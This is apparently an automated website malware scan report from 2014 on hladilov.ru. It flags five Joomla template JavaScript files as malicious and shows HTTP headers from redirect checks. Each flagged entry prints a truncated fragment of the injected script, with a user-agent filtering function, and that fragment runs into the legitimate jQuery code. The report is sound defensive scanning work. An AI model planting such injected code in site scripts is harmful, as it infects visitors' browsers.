Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hladilov.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hladilov.ru/ | 200 OK Content-Length: 10809 Content-Type: text/html | clean |
http://hladilov.ru/templates/yoo_crystal_j15/warp/libraries/jquery/jquery.js | 200 OK Content-Length: 92578 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob 9)return Math.max(f.documentElement["client"+b],f.body["scroll"+b],f.documentElement["scroll"+b],f.body["offset"+b],f.documentElement["offset"+b]);else if(e===z){f=c.css(f,d);h=parseFloat(f);return c.isNaN(h)?f:h}else return this.css(d,typeof e==="string"?e:e+"px")}});I.jQuery=I.$=c})(window);jQuery.noConflict(); Antivirus reports:
| ||
http://hladilov.ru/templates/yoo_crystal_j15/warp/js/warp.js | 200 OK Content-Length: 14152 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob d-a,0,b,d)+c},easeOutBounce:function(e,a,c,b,d){return(a/=d)<1/2.75?b*7.5625*a*a+c:a<2/2.75?b*(7.5625*(a-=1.5/2.75)*a+0.75)+c:a<2.5/2.75?b*(7.5625*(a-=2.25/2.75)*a+0.9375)+c:b*(7.5625*(a-=2.625/2.75)*a+0.984375)+c},easeInOutBounce:function(e,a,c,b,d){if(a<d/2)return g.easing.easeInBounce(e,a*2,0,b,d)*0.5+c;return g.easing.easeOutBounce(e,a*2-d,0,b,d)*0.5+b*0.5+c}})})(jQuery); Antivirus reports:
| ||
http://hladilov.ru/templates/yoo_crystal_j15/warp/js/accordionmenu.js | 200 OK Content-Length: 8010 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob b!="initialize")f.data(c.prototype.name)[b].apply(f.data(c.prototype.name),Array.prototype.slice.call(e,1));else if(!b||a.isPlainObject(b)){var g=new c;c.prototype.initialize&&g.initialize.apply(g,a.merge([f],e));f.data(c.prototype.name,g)}else a.error("Method "+b+" does not exist on jQuery."+c.name)})}})(jQuery); Antivirus reports:
| ||
http://hladilov.ru/templates/yoo_crystal_j15/warp/js/dropdownmenu.js | 200 OK Content-Length: 12291 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob c.fn[m.prototype.name]=function(){var i=arguments,d=i[0]?i[0]:null;return this.each(function(){var a=c(this);if(m.prototype[d]&&a.data(m.prototype.name)&&d!="initialize")a.data(m.prototype.name)[d].apply(a.data(m.prototype.name),Array.prototype.slice.call(i,1));else if(!d||c.isPlainObject(d)){var l=new m;m.prototype.initialize&&l.initialize.apply(l,c.merge([a],i));a.data(m.prototype.name,l)}else c.error("Method "+d+" does not exist on jQuery."+m.name)})}})(jQuery); Antivirus reports:
| ||
http://hladilov.ru/templates/yoo_crystal_j15/js/template.js | 200 OK Content-Length: 9137 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob $('a[href="#page"]').smoothScroller({ duration: 500 }); $('div.headerbox div.deepest').matchHeight(20); $('div.topbox div.deepest').matchHeight(20); $('div.bottombox div.deepest').matchHeight(20); $('div.maintopbox div.deepest').matchHeight(20); $('div.mainbottombox div.deepest').matchHeight(20); $('div.contenttopbox div.deepest').matchHeight(20); $('div.contentbottombox div.deepest').matchHeight(20); }); Antivirus reports:
| ||
http://www.pogoda.msk.ru/text_informer.php?st=1 | 200 OK Content-Length: 902 Content-Type: text/html | clean |
http://www.pogoda.msk.ru/ | 200 OK Content-Length: 25400 Content-Type: text/html | clean |
http://www.pogoda.msk.ru/swfobject.js | 200 OK Content-Length: 10220 Content-Type: text/javascript | clean |
http://www.pogoda.msk.ru//yandex.st/share/share.js/ | HTTP/1.1 302 Found Connection: close Date: Thu, 04 Sep 2014 23:21:35 GMT Location: http://www.pogoda.msk.ru Server: Apache/2.2.15 (CentOS) Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.pogoda.msk.ru/test404page.js | HTTP/1.1 302 Found Connection: close Date: Thu, 04 Sep 2014 23:21:35 GMT Location: http://www.pogoda.msk.ru Server: Apache/2.2.15 (CentOS) Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21259 Content-Type: text/javascript | clean |
http://www.pogoda.msk.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | HTTP/1.1 302 Found Connection: close Date: Thu, 04 Sep 2014 23:21:36 GMT Location: http://www.pogoda.msk.ru Server: Apache/2.2.15 (CentOS) Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
https://w.uptolike.com/widgets/v1/zp.js?pid=1254960 | 200 OK Content-Length: 38558 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hladilov.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 04 Sep 2014 23:12:20 GMT
Pragma: no-cache
Server: LiteSpeed
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 04 Sep 2014 23:12:20 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f98627564affcb1ebf3239b75c3415d0=52dfe19c2b5f5228b63d132448f04716; path=/
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: hladilov.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 04 Sep 2014 23:12:20 GMT
Pragma: no-cache
Server: LiteSpeed
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 04 Sep 2014 23:12:20 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f98627564affcb1ebf3239b75c3415d0=52dfe19c2b5f5228b63d132448f04716; path=/
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: hladilov.ru
Referer: http://www.google.com/search?q=hladilov.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hladilov.ru
Referer: http://www.google.com/search?q=hladilov.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.